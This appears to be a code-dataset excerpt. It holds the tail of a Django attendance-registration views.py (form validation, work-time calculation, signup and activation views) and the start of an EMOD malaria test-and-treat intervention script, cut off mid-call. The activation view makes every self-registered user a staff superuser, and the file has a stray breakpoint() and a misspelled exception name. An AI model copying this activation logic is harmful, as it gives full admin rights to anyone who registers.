t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n })\n print('starterror')\n errflg = True\n if( (t1 != '' and endtime1 == '') or (t2 != '' and endtime2 == '') or (t3 != '' and endtime3 == '') or (t4 != '' and endtime4 == '') ):\n context.update({\n 'enderror': '終了時刻が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n })\n print('enderror')\n errflg = True\n \n\n if( (t1 != '' and koutei1 == '') or (t2 != '' and koutei2 == '') or (t3 != '' and koutei3 == '') or (t4 != '' and koutei4 == '')):\n context.update({\n 'kouteierror': '工程が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu, \n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n errflg = True\n if( (t1 != '' and gyomuselect1 == '') or (t2 != '' and gyomuselect2 == '') or (t3 != '' and gyomuselect3 == '') or (t4 != '' and gyomuselect4 == '')):\n context.update({\n 'workerror': '業務が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n print('workerror')\n errflg = True\n if( timestr == ''):\n context.update({\n 'timeerror': '日付が入力されていません',\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n errflg = True\n if (todo0 == ''):\n todo0db = 0\n else:\n todo0db = 1\n \n if (todo1 == ''):\n todo1db = 0\n else:\n todo1db = 1\n \n if (todo2 == ''):\n todo2db = 0\n else:\n todo2db = 1\n\n if (todo3 == ''):\n todo3db = 0\n else:\n todo3db = 1\n \n if (todo4 == ''):\n todo4db = 0\n else:\n todo4db = 1\n \n if (todo5 == ''):\n todo5db = 0\n else:\n todo5db = 1\n\n if(todo0db == 1 or todo1db == 1 or todo2db == 1 or todo3db == 1 or todo4db == 1 or todo5db == 1 ):\n todok = 1\n if errflg:\n return render(request, 'registration/kintai.html', context)\n \n startn = start.split(':')\n endn = end.split(':')\n starth = int(startn[0])\n endh = int(endn[0])\n if(starth >= endh):\n endh = endh + 24\n startm = int(startn[1])\n endm = int(endn[1])\n min = endm - startm\n min = min / 60\n \n worktime = endh - starth + min - float(resttime)\n worktime = round(worktime,2)\n if (worktime < 7.5):\n paidtime = math.ceil(7.5 - worktime)\n \n if (starth <= 8 and starth >= 5 and (endh >= 9 or endh <= 4)):\n morningtime = 9 - starth - startm / 60\n if(starth <= 8 and starth >= 5 and (endh < 9 or endh > 4)):\n morningtime = worktime\n \n if(startm > endm):\n worktime = worktime - 1\n if (endh >= 22 or endh <= 5 or starth >= 22 or starth <= 5):\n \n if (starth < 22 and starth > 5):\n if (endh >= 22):\n midtime = endh - 22 + endm / 60\n if (endh <= 5):\n midtime = endh + 2 + endm / 60\n else:\n if (starth >= 22 or starth <= 5):\n if ( endh <= 5 and starth < 22):\n midtime = endh - starth + min\n if ( endh <= 5 and starth >= 22):\n midtime = endh + 24 - starth - min\n if ( end > 5 and start < 22):\n midtime = 5 - starth - min\n if ( end > 5 and start >= 22):\n midtime = 24 - starth + 4 - startm / 60\n if (worktime > 7.5):\n midover = midtime\n \n if (todo4 == ''):\n context.update({\n 'miderror': '深夜有が選択されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n })\n return render(request, 'registration/kintai.html', context)\n\n\n \n #DB格納(出勤)\n b = kintai_touroku_info(syaincd=ida,syainname = name, \n ymd=timestr,starttime=start,endtime=end,worktime=worktime,overtime=over,\n resttime=resttime, attkbn=absdb, holidaykbn=holdb, holidayriyu=riyu,\n todoke_tikoku=todo0db, todoke_soutai=todo1db, todoke_midnight=todo2db, todoke_hayade=todo3db, \n todoke_irregular=todo4db, todoke_holiwork=todo5db, todokekbn=todok,mntime = midtime,mnovertime = midover,\n paidtime = paidtime,\n projectname1 = t1,kouteiname1 = koutei1, workname1 = gyomuselect1, start1 = starttime1, end1 = endtime1, rest1 = resttime1,\n projectname2 = t2,kouteiname2 = koutei2, workname2 = gyomuselect2, start2 = starttime2, end2 = endtime2, rest2 = resttime2,\n projectname3 = t3,kouteiname3 = koutei3, workname3 = gyomuselect3, start3 = starttime3, end3 = endtime3, rest3 = resttime3,\n projectname4 = t4,kouteiname4 = koutei4, workname4 = gyomuselect4, start4 = starttime4, end4 = endtime4, rest4 = resttime4,\n projectcd1 = projectcd1,projectcd2 = projectcd2,projectcd3 = projectcd3,projectcd4 = projectcd4,\n kouteicd1 = kouteicd1,kouteicd2 = kouteicd2,kouteicd3 = kouteicd3,kouteicd4 = kouteicd4,\n workcd1 = workcd1,workcd2 = workcd2,workcd3 = workcd3,workcd4 = workcd4)\n #DB格納(欠勤)\n else:\n start = '00:00'\n end = '00:00'\n worktime= 0.0\n over = 0.0\n b = kintai_touroku_info(syaincd=ida,syainname = name, \n ymd=timestr, starttime=start,endtime=end,worktime=worktime,overtime=over,attkbn=absdb, holidaykbn=holdb, holidayriyu=riyu,\n start1 = starttime1, end1 = endtime1,\n start2 = starttime2, end2 = endtime2,\n start3 = starttime3, end3 = endtime3,\n start4 = starttime4, end4 = endtime4,\n todokekbn=todok)\n\n listf = kintai_touroku_info.objects.filter(ymd = timestr)\n \n \n if (len(listf) == 0):\n b.save()\n else:\n b = kintai_touroku_info.objects.filter(ymd = timestr)\n b.update(starttime=start,endtime=end,worktime=worktime,overtime=over,\n resttime=resttime,attkbn=absdb, holidaykbn=holdb, holidayriyu=riyu,\n todoke_tikoku=todo0db, todoke_soutai=todo1db, todoke_midnight=todo2db, todoke_hayade=todo3db, \n todoke_irregular=todo4db, todoke_holiwork=todo5db, todokekbn=todok,\n projectname1 = t1,kouteiname1 = koutei1, workname1 = gyomuselect1, start1 = starttime1, end1 = endtime1, rest1 = resttime1,\n projectname2 = t2,kouteiname2 = koutei2, workname2 = gyomuselect2, start2 = starttime2, end2 = endtime2, rest2 = resttime2,\n projectname3 = t3,kouteiname3 = koutei3, workname3 = gyomuselect3, start3 = starttime3, end3 = endtime3, rest3 = resttime3,\n projectname4 = t4,kouteiname4 = koutei4, workname4 = gyomuselect4, start4 = starttime4, end4 = endtime4, rest4 = resttime4,\n projectcd1 = projectcd1,projectcd2 = projectcd2,projectcd3 = projectcd3,projectcd4 = projectcd4,\n kouteicd1 = kouteicd1,kouteicd2 = kouteicd2,kouteicd3 = kouteicd3,kouteicd4 = kouteicd4,\n workcd1 = workcd1,workcd2 = workcd2,workcd3 = workcd3,workcd4 = workcd4)\n \n context = {\n 'message': '勤怠登録しました',\n 'starttime':start, 'endtime': end,'worktime': worktime,'overtime': over,'resttime': resttime,\n 'ymd': timestr,'projectname1': t1,'projectname2': t2,'projectname3': t3,'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''), 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''), 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,'koutei2': value2, 'koutei3': value3,'koutei4': value4,\n 'kouteiselect1': koutei1,'kouteiselect2': koutei2, 'kouteiselect3': koutei3, 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,'gyomu2': gyomu2,'gyomu3': gyomu3, 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,'gyomuselect2': gyomuselect2,'gyomuselect3': gyomuselect3,'gyomuselect4': gyomuselect4,\n 'abs': abs, 'holidaykbn': hol, 'riyu' : riyu,\n 'chikoku' : todo0,'hayade' : todo1,'soutai' : todo2,'hensoku' : todo3,'midnight': todo4, 'holiday' : todo5,\n 'user' : ida,\n\n }\n return render(request, 'registration/kintai.html', context)\n\n\n#勤怠入力画面ロード \ndef kintaiload(request):\n template = loader.get_template('registration/kintai.html')\n id = request.session.get('User','')\n nowyear = str(datetime.date.today().year)\n nowmonth = str(format(datetime.date.today().month,'02'))\n nowday = str(format(datetime.date.today().day,'02'))\n nowdate = nowyear + \"-\" + nowmonth + \"-\" + nowday\n monthyear = request.POST.get('dateselect',nowdate)\n\n listf = kintai_touroku_info.objects.filter(ymd = monthyear, syaincd = id)\n if (len(listf) == 1):\n\n attkbn = listf[0].attkbn\n holidaykbn = listf[0].holidaykbn\n holidayriyu = listf[0].holidayriyu\n start = str(listf[0].starttime)\n start = start[:5]\n end = str(listf[0].endtime)\n end = end[:5]\n start1 = str(listf[0].start1)\n start1 = start1[:5]\n end1 = str(listf[0].end1)\n end1 = end1[:5]\n start2 = str(listf[0].start2)\n start2 = start2[:5]\n end2 = str(listf[0].end2)\n end2 = end2[:5]\n start3 = str(listf[0].start3)\n start3 = start3[:5]\n end3 = str(listf[0].end3)\n end3 = end3[:5]\n start4 = str(listf[0].start4)\n start4 = start4[:5]\n end4 = str(listf[0].end4)\n end4 = end4[:5]\n todo0 = listf[0].todoke_tikoku\n todo1 = listf[0].todoke_soutai\n todo2 = listf[0].todoke_midnight\n todo3 = listf[0].todoke_hayade\n todo4 = listf[0].todoke_irregular\n todo5 = listf[0].todoke_holiwork\n koutei1 = project_work.objects.filter(projectname=listf[0].projectname1).distinct('kouteiname')\n koutei2 = project_work.objects.filter(projectname=listf[0].projectname2).distinct('kouteiname')\n koutei3 = project_work.objects.filter(projectname=listf[0].projectname3).distinct('kouteiname')\n koutei4 = project_work.objects.filter(projectname=listf[0].projectname4).distinct('kouteiname')\n gyomu1 = project_work.objects.filter(projectname=listf[0].projectname1,kouteiname=listf[0].kouteiname1)\n gyomu2 = project_work.objects.filter(projectname=listf[0].projectname2,kouteiname=listf[0].kouteiname2)\n gyomu3 = project_work.objects.filter(projectname=listf[0].projectname3,kouteiname=listf[0].kouteiname3)\n gyomu4 = project_work.objects.filter(projectname=listf[0].projectname4,kouteiname=listf[0].kouteiname4)\n \n if (attkbn == 0 ):\n attkbn = '出勤'\n if (attkbn == 1 ):\n attkbn = '欠勤'\n if (holidaykbn == 0 ):\n holidaykbn = '取得なし'\n if (holidaykbn == 1 ):\n holidaykbn = '有給休暇'\n if (holidaykbn == 2 ):\n holidaykbn = '特休・その他休暇'\n if (holidaykbn == 3 ):\n holidaykbn = '代休'\n if (holidaykbn == 4 ):\n holidaykbn = 'その他'\n if (holidaykbn == 5 ):\n holidaykbn = '半休等'\n if (todo0 == 1 ):\n todo0 = '遅刻'\n else:\n todo0 = ''\n if (todo1 == 1 ):\n todo1 = '早出有'\n else:\n todo1 = ''\n if (todo2 == 1 ):\n todo2 = '早退'\n else:\n todo2 = ''\n if (todo3 == 1 ):\n todo3 = '変則勤務'\n else:\n todo3 = ''\n if (todo4 == 1 ):\n todo4 = '深夜有'\n else:\n todo4 = ''\n if (todo5 == 1 ):\n todo5 = '休日出勤'\n else:\n todo5 = ''\n context = {\n 'starttime':start, 'endtime': end,\n 'worktime': listf[0].worktime,'overtime': listf[0].overtime,\n 'resttime': listf[0].resttime,'ymd': monthyear,\n 'projectname1':listf[0].projectname1, 'projectname2':listf[0].projectname2,\n 'projectname3':listf[0].projectname3, 'projectname4':listf[0].projectname4,\n 'koutei1': koutei1, 'koutei2': koutei2,'koutei3': koutei3,'koutei4': koutei4,\n 'kouteiselect1': listf[0].kouteiname1, 'kouteiselect2': listf[0].kouteiname2,'kouteiselect3': listf[0].kouteiname3, 'kouteiselect4': listf[0].kouteiname4,\n 'gyomu1': gyomu1,'gyomu2': gyomu2, 'gyomu3': gyomu3, 'gyomu4': gyomu4,\n 'gyomuselect1': listf[0].workname1, 'gyomuselect2': listf[0].workname2,\n 'gyomuselect3': listf[0].workname3, 'gyomuselect4': listf[0].workname4,\n 'starttime1':start1, 'endtime1': end1, 'resttime1': listf[0].rest1,\n 'starttime2':start2,'endtime2': end2, 'resttime2': listf[0].rest2,\n 'starttime3':start3,'endtime3': end3, 'resttime3': listf[0].rest3,\n 'starttime4':start4,'endtime4': end4, 'resttime4': listf[0].rest4,\n 'holidaykbn': holidaykbn, 'abs': attkbn, 'riyu': holidayriyu,\n 'chikoku': todo0, 'hayade': todo1,'soutai': todo2, 'hensoku': todo3, 'midnight': todo4, 'holiday': todo5,\n 'user' : id,\n } \n return render(request, 'registration/kintai.html', context)\n context = {\n 'ymd': monthyear,\n 'user' : id,\n } \n return render(request, 'registration/kintai.html', context)\n \n \n\n\nclass UserCreate(generic.CreateView):\n \"\"\"ユーザ登録\"\"\"\n template_name = 'customLogin/user_create.html'\n form_class = CustomUserCreateForm\n\n def get(self, request, **kwargs):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n return super().get(request, **kwargs)\n\n def form_valid(self, form):\n # 仮登録\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n\n # メール送信\n current_site = get_current_site(self.request)\n domain = current_site.domain\n context = {\n 'protocol': 'https' if self.request.is_secure() else 'http',\n 'domain': domain,\n 'token': dumps(user.pk),\n 'user': user\n }\n subject_template = get_template('customLogin/mail/subject.txt')\n message_template = get_template('customLogin/mail/message.txt')\n subject = subject_template.render(context)\n message = message_template.render(context)\n user.email_user(subject, message)\n return redirect('customLogin:user_create_done')\n \n \n \nclass UserCreateComplete(generic.TemplateView):\n \"\"\"本登録完了\"\"\"\n template_name = 'customLogin/user_create_complete.html'\n timeout_seconds = getattr(settings, 'ACTIVATION_TIMEOUT_SECONDS', 60 * 60 * 24) # デフォルトでは1日以内\n\n def get(self, request, **kwargs):\n \"\"\"tokenが正しければ本登録.\"\"\"\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n\n token = kwargs.get('token')\n try:\n user_pk = loads(token, max_age=self.timeout_seconds)\n\n # 期限切れ\n except SignatureExpired:\n return HttpResponseBadRequest()\n\n # tokenが間違っている\n except BadSignature:\n return HttpResponseBadRequest()\n\n # tokenは問題なし\n try:\n user = User.objects.get(pk=user_pk)\n except User.DoenNotExist:\n return HttpResponseBadRequest()\n\n if not user.is_active:\n # 問題なければ本登録とする\n user.is_active = True\n user.is_staff = True\n user.is_superuser = True\n user.save()\n\n # QRコード生成\n request.session[\"img\"] = utils.get_image_b64(utils.get_auth_url(user.email, utils.get_secret(user)))\n\n return super().get(request, **kwargs)\n\n return HttpResponseBadRequest()\n\n\nclass CustomLoginView(LoginView):\n \"\"\"ログイン\"\"\"\n form_class = CustomLoginForm\n template_name = 'customLogin/user_login.html'\n\n def get(self, request, **kwargs):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n return super().get(request, **kwargs)\n\nclass UserCreateDone(generic.TemplateView):\n \"\"\"仮登録完了\"\"\"\n \n def get(self, request, **kwargs):\n if request.user.is_authenticated:\n breakpoint()\n return HttpResponseRedirect('/')\n return super().get(request, **kwargs)\n\n","repo_name":"fosnetkintaigroup/src","sub_path":"venv/mysite/app_config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":63705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2581029420","text":"import os\nimport copy\nimport pandas as pd\nimport sys\nsys.path.append('../helpers/')\nfrom load_paths import load_box_paths\nfrom malaria.interventions.health_seeking import add_health_seeking\nfrom malaria.interventions.malaria_diagnostic import add_diagnostic_survey\nfrom malaria.interventions.malaria_drug_campaigns import add_drug_campaign\nfrom malaria.interventions.adherent_drug import configure_adherent_drug\nfrom dtk.interventions.migrate_to import add_migration_event\n\ndatapath, projectpath = load_box_paths()\n\n# Study MTTT Interventions\n\ndef add_MTTT(cb, start=244, interval=90, rounds=4, coverage=1, tracking_only=False):\n cb.update_params({'Report_Event_Recorder': 1,\n 'Report_Event_Recorder_Ignore_Events_In_List': 0,\n 'Report_Event_Recorder_Events': ['RDT_Positive_DT1',\n 'RDT_Positive_DT2'],\n 'Report_Event_Recorder_Individual_Properties': ['Ledger'],\n 'Custom_Individual_Events': ['MTTT_Done',\n 'RDT_Positive_MTTT',\n 'Received_MTTT_Drugs',\n 'DT1_Done', 'RDT_Positive_DT1',\n 'DT2_Done', 'RDT_Positive_DT2']})\n DT1 = 0.09\n DT2 = 0.1\n Sens1 = 0.5\n Sens2 = 0.87\n Spec1 = 0.95\n Spec2 = 0.95\n if tracking_only == True:\n pass\n else:\n # Hard-coded (for now) loop through 10 start_days\n for d in range(10):\n # Quarterly RDT on assigned start day\n # Node 1 - Nxtek\n add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT1,\n sensitivity= Sens1, specificity=Spec1,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[1],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Node 2- SDBioline\n add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT2,\n sensitivity=Sens2, specificity=Spec2,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[2],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Drugs given if RDT positive\n #adherent_drug_configs= mttt_adherence_configuration(cb,adherence)\n add_drug_campaign(cb=cb, campaign_type=\"MDA\", drug_code=\"AL\", start_days=[1],\n coverage=coverage, trigger_condition_list=[\"RDT_Positive_MTTT\"],\n receiving_drugs_event_name=\"Received_MTTT_Drugs\",\n nodeIDs=[1, 2], target_residents_only=0)\n\n # Other 'Listening' RDTs to track RDT prevalence throughout study period (not just during MTTT rounds)\n # Should NOT trigger any intervention / drug campaign\n\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT1, sensitivity=Sens1, specificity=Spec1,\n event_name=\"DT1\", received_test_event=\"DT1_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT1'}])\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT2, sensitivity=Sens2, specificity=Spec2,\n event_name=\"DT2\", received_test_event=\"DT2_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT2'}])\n\n return {\n 'MTTT_Coverage': coverage\n }\n\ndef add_MTTT_2(cb, start=244, interval=90, rounds=4, coverage=1, tracking_only=False):\n cb.update_params({'Report_Event_Recorder': 1,\n 'Report_Event_Recorder_Ignore_Events_In_List': 0,\n 'Report_Event_Recorder_Events': ['RDT_Positive_DT1',\n 'RDT_Positive_DT2'],\n 'Report_Event_Recorder_Individual_Properties': ['Ledger'],\n 'Custom_Individual_Events': ['MTTT_Done',\n 'RDT_Positive_MTTT',\n 'Received_MTTT_Drugs',\n 'DT1_Done', 'RDT_Positive_DT1',\n 'DT2_Done', 'RDT_Positive_DT2']})\n DT1 = 3.2 # (default PCR detection threshold, from malaria/symptoms.py which should match insetChart reported PCR_Parasite_Prevalence used for Calibration)\n DT2 = 3.2\n Sens1 = 0.742 # Values from Linda's paper\n Sens2 = 0.755\n Spec1 = 0.846\n Spec2 = 0.861\n if tracking_only == True:\n pass\n else:\n # Hard-coded (for now) loop through 10 start_days\n for d in range(10):\n # Quarterly RDT on assigned start day\n # Node 1 - Nxtek\n add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT1,\n sensitivity= Sens1, specificity=Spec1,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[1],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Node 2- SDBioline\n add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT2,\n sensitivity=Sens2, specificity=Spec2,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[2],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Drugs given if RDT positive\n #adherent_drug_configs= mttt_adherence_configuration(cb,adherence)\n add_drug_campaign(cb=cb, campaign_type=\"MDA\", drug_code=\"AL\", start_days=[1],\n coverage=coverage, trigger_condition_list=[\"RDT_Positive_MTTT\"],\n receiving_drugs_event_name=\"Received_MTTT_Drugs\",\n nodeIDs=[1, 2], target_residents_only=0)\n\n # Other 'Listening' RDTs to track RDT prevalence throughout study period (not just during MTTT rounds)\n # Should NOT trigger any intervention / drug campaign\n\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT1, sensitivity=Sens1, specificity=Spec1,\n event_name=\"DT1\", 